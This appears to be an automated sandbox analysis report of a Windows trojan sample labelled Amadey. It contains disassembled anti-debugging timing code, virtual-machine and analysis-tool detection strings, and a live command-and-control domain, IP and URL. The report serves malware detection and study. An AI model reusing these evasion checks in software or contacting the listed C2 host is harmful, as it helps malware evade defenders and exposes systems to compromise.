Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0BC5 second address: 70A0BCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0BCB second address: 70A0BEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBCC4EB33B4h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0C34 second address: 70A0C3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0C3A second address: 70A0C3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0C3E second address: 70A0C42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0C42 second address: 70A0C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a pushad 0x0000000b mov di, 63A4h 0x0000000f pushfd 0x00000010 jmp 00007FBCC4EB33ADh 0x00000015 add ch, FFFFFFE6h 0x00000018 jmp 00007FBCC4EB33B1h 0x0000001d popfd 0x0000001e popad 0x0000001f test edi, edi 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 jmp 00007FBCC4EB33B3h 0x00000029 mov di, cx 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0C91 second address: 70A0C97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0C97 second address: 70A0C9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0C9B second address: 70A0D01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007FBD352276DCh 0x0000000e jmp 00007FBCC4DE8CD3h 0x00000013 mov eax, dword ptr [ebp-04h] 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FBCC4DE8CD4h 0x0000001d or esi, 3B963E48h 0x00000023 jmp 00007FBCC4DE8CCBh 0x00000028 popfd 0x00000029 call 00007FBCC4DE8CD8h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0D01 second address: 70A0D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov dword ptr [esi+08h], eax 0x00000009 jmp 00007FBCC4EB33B7h 0x0000000e lea eax, dword ptr [ebx+70h] 0x00000011 pushad 0x00000012 mov ax, 60ABh 0x00000016 jmp 00007FBCC4EB33B0h 0x0000001b popad 0x0000001c push 00000001h 0x0000001e jmp 00007FBCC4EB33B0h 0x00000023 nop 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jmp 00007FBCC4EB33ADh 0x0000002c pushfd 0x0000002d jmp 00007FBCC4EB33B0h 0x00000032 adc ch, FFFFFFC8h 0x00000035 jmp 00007FBCC4EB33ABh 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0D7E second address: 70A0DBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov edx, 1B6FF572h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FBCC4DE8CD9h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0DBD second address: 70A0DD7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 jmp 00007FBCC4EB33AAh 0x0000000d lea eax, dword ptr [ebp-18h] 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0DD7 second address: 70A0DDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0DDC second address: 70A0E5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FBCC4EB33B5h 0x00000009 xor esi, 2E005256h 0x0000000f jmp 00007FBCC4EB33B1h 0x00000014 popfd 0x00000015 call 00007FBCC4EB33B0h 0x0000001a pop eax 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f pushad 0x00000020 push ecx 0x00000021 pushfd 0x00000022 jmp 00007FBCC4EB33B3h 0x00000027 jmp 00007FBCC4EB33B3h 0x0000002c popfd 0x0000002d pop esi 0x0000002e push eax 0x0000002f push edx 0x00000030 call 00007FBCC4EB33AFh 0x00000035 pop esi 0x00000036 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0EC8 second address: 70A0ECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0ECE second address: 70A0EFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4EB33B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FBCC4EB33B0h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0EFD second address: 70A0F01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0F01 second address: 70A0F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0F07 second address: 70A0F0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0F0D second address: 70A0F11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0F11 second address: 70A0F15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A0F15 second address: 70A0F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test edi, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FBCC4EB33ABh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A10A2 second address: 70A1169 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FBD352272F1h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FBCC4DE8CCBh 0x00000016 and esi, 5CFB379Eh 0x0000001c jmp 00007FBCC4DE8CD9h 0x00000021 popfd 0x00000022 popad 0x00000023 mov edx, dword ptr [ebp+08h] 0x00000026 jmp 00007FBCC4DE8CCEh 0x0000002b mov eax, dword ptr [esi] 0x0000002d jmp 00007FBCC4DE8CD0h 0x00000032 mov dword ptr [edx], eax 0x00000034 jmp 00007FBCC4DE8CD0h 0x00000039 mov eax, dword ptr [esi+04h] 0x0000003c jmp 00007FBCC4DE8CD0h 0x00000041 mov dword ptr [edx+04h], eax 0x00000044 pushad 0x00000045 pushfd 0x00000046 jmp 00007FBCC4DE8CCEh 0x0000004b adc ch, 00000058h 0x0000004e jmp 00007FBCC4DE8CCBh 0x00000053 popfd 0x00000054 mov dx, cx 0x00000057 popad 0x00000058 mov eax, dword ptr [esi+08h] 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007FBCC4DE8CD1h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A1169 second address: 70A120F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 5F47C782h 0x00000008 pushfd 0x00000009 jmp 00007FBCC4EB33B3h 0x0000000e adc eax, 6DEB527Eh 0x00000014 jmp 00007FBCC4EB33B9h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov dword ptr [edx+08h], eax 0x00000020 pushad 0x00000021 mov di, si 0x00000024 pushfd 0x00000025 jmp 00007FBCC4EB33B8h 0x0000002a and ax, CCA8h 0x0000002f jmp 00007FBCC4EB33ABh 0x00000034 popfd 0x00000035 popad 0x00000036 mov eax, dword ptr [esi+0Ch] 0x00000039 jmp 00007FBCC4EB33B6h 0x0000003e mov dword ptr [edx+0Ch], eax 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FBCC4EB33B7h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRDTSC instruction interceptor: First address: 70A120F second address: 70A1268 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCC4DE8CD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FBCC4DE8CD3h 0x00000015 adc cx, 1D5Eh 0x0000001a jmp 00007FBCC4DE8CD9h 0x0000001f popfd 0x00000020 push eax 0x00000021 pop edx 0x00000022 popad 0x00000023 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSpecial instruction interceptor: First address: D9DB07 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSpecial instruction interceptor: First address: F41E90 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSpecial instruction interceptor: First address: F421F0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSpecial instruction interceptor: First address: F6EFC7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSpecial instruction interceptor: First address: FD1F89 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeCode function: 0_2_070705E9 rdtsc 0_2_070705E9
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeAPI coverage: 2.9 %
Source: C:\Users\user\Desktop\j6Nv9kUydV.exe TID: 8124Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: j6Nv9kUydV.exe, j6Nv9kUydV.exe, 00000000.00000002.1740088892.0000000000F25000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.4.drBinary or memory string: VMware
Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: j6Nv9kUydV.exe, 00000000.00000002.1740716394.00000000018F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.4.drBinary or memory string: vmci.sys
Source: j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: j6Nv9kUydV.exe, 00000000.00000003.1332536006.0000000001882000.00000004.00000020.00020000.00000000.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1332929179.0000000001885000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
Source: Amcache.hve.4.drBinary or memory string: VMware-42 27 ae 88 8c 2b 21 02-a5 86 22 5b 84 51 ac f0
Source: Amcache.hve.4.drBinary or memory string: VMware20,1
Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: j6Nv9kUydV.exe, 00000000.00000002.1740088892.0000000000F25000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeThread information set: HideFromDebuggerJump to behavior
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeCode function: 0_2_07070849 Start: 07070C57 End: 070708620_2_07070849
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeFile opened: NTICE
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeFile opened: SICE
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeCode function: 0_2_070705E9 rdtsc 0_2_070705E9
Source: j6Nv9kUydV.exe, j6Nv9kUydV.exe, 00000000.00000002.1740088892.0000000000F25000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: (EProgram Manager
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\j6Nv9kUydV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: procmon.exe
Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
Source: j6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe
Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

Stealing of Sensitive Information

barindex
Leaks process information
Source: global trafficTCP traffic: 192.168.2.10:49716 -> 185.121.15.192:80
Source: global trafficTCP traffic: 192.168.2.10:49717 -> 185.121.15.192:80
Source: global trafficTCP traffic: 192.168.2.10:49723 -> 185.121.15.192:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		2
Process Injection		24
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		2
Process Injection		LSASS Memory24
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Obfuscated Files or Information		Security Account Manager12
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
Software Packing		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets214
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
j6Nv9kUydV.exe66%ReversingLabsWin32.Trojan.Amadey
j6Nv9kUydV.exe100%AviraTR/Crypt.TPM.Gen
j6Nv9kUydV.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fivetk5vt.top
185.121.15.192
truefalse
    		high
    httpbin.org
    		98.85.100.80
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745false
        		high
        https://httpbin.org/ipfalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://curl.se/docs/hsts.htmlj6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpfalse
            		high
            http://html4/loose.dtdj6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpfalse
              		high
              https://httpbin.org/ipbeforej6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpfalse
                		high
                https://curl.se/docs/http-cookies.htmlj6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpfalse
                  		high
                  http://upx.sf.netAmcache.hve.4.drfalse
                    		high
                    http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOj6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmpfalse
                      		unknown
                      https://curl.se/docs/alt-svc.htmlj6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high
                        http://.cssj6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpfalse
                          		high
                          http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ173451474535a1j6Nv9kUydV.exe, 00000000.00000002.1740716394.000000000184E000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://.jpgj6Nv9kUydV.exe, 00000000.00000002.1739535138.0000000000C30000.00000040.00000001.01000000.00000003.sdmp, j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpfalse
                              		high
                              http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ1734514745lsej6Nv9kUydV.exe, 00000000.00000002.1740716394.000000000184E000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ17j6Nv9kUydV.exe, 00000000.00000003.1298962559.00000000072EF000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  185.121.15.192
                                  		home.fivetk5vt.topSpain
                                  		207046REDSERVICIOESfalse
                                  98.85.100.80
                                  		httpbin.orgUnited States
                                  		11351TWC-11351-NORTHEASTUSfalse

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1578975
                                  Start date and time:2024-12-20 17:17:08 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 5m 28s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:10
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:j6Nv9kUydV.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:84e0e622857460da96501532a233c862.exe
                                  Detection:MAL
